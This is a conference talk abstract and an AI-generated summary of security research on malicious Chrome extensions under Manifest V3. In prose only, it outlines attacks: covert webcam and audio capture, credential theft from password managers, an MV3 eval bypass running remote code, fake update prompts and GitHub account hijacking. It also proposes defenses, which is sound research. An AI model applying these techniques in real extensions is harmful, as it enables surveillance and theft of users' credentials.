Presentation Material
Abstract
Ever since the pandemic and the rising popularity of work-from-home and hybrid models, there has been an increase in the usage of browsers, particularly video conferencing and collaboration applications. While some extensions enhance the user experience, some can gravely affect users’ privacy and security.
Over the past few years, extensions have gained recognition for nefarious activities, from simple color picker extensions to productivity-first AI extensions. And now more than ever, attackers are leveraging malicious extensions to steal user data, promote ads, affiliate marketing, and more. Realizing the abuse, Google pivoted from the MV2 model to the latest MV3, providing better security and locking down the extension from running rampant. While some security measures have been introduced in MV3, it is far from safe. In this talk, we will be demonstrating a suite of attacks, while requiring the least amount of permissions, which 95% of extensions on the Chrome store have. We will showcase stealth stealing of webcam feed, audio streams, clipboard data, and stealing credentials from other extensions like password managers.
MV3 also introduced security measures to block the usage of functions like eval and new Function that allowed arbitrary code execution. Weβll showcase how an extension can still do arbitrary code execution effectively bypassing the MV3 restrictions.
In this talk, we will also propose changes to the extension security model to prevent the lurking loopholes. We will also be demonstrating how malicious extensions can interfere with other extensions and steal sensitive information such as Credit card, passwords, OTP, etc, from other extensions.
AI Generated Summary
This talk examined the security risks posed by malicious browser extensions, focusing on vulnerabilities in the Chromium extension architecture and the transition to Manifest V3 (MV3). The research demonstrated that extensions operate with significant privileges, allowing them to act as a “backdoor” within the browser.
Key findings included multiple attack techniques. Content scripts, injected into web pages, could modify page content and behavior without requiring explicit host permissions in the manifest. Despite MV3 restrictions banning eval() and enforcing a strict Content Security Policy (CSP), bypasses existed using alternative JavaScript evaluation methods (e.g., bracket notation) to execute remote code delivered from a attacker-controlled server. This enabled live, dynamic payloads.
Practical attack demos illustrated severe implications: an extension could inject a fake software update prompt onto a trusted site like Zoom to deliver malware, silently hijack a GitHub account by using its privileges to add itself as a collaborator via background fetches, and spoof a password manager’s interface to harvest credentials. Most critically, an extension could intercept and livestream a Google Meet session without any visible indicator to the user, exploiting its position in the browser’s multi-process architecture to access media streams.
The talk concluded that the Chrome Web Store’s review process is superficial, failing to analyze code deeply. A growing threat involves attackers purchasing popular extensions to weaponize their existing user base. The core takeaway is that browser extensions constitute a powerful, overlooked attack surface with privileges exceeding those of the web pages themselves, requiring enhanced scrutiny, network monitoring for anomalous extension behavior, and stricter enterprise policies regarding extension deployment and ownership changes.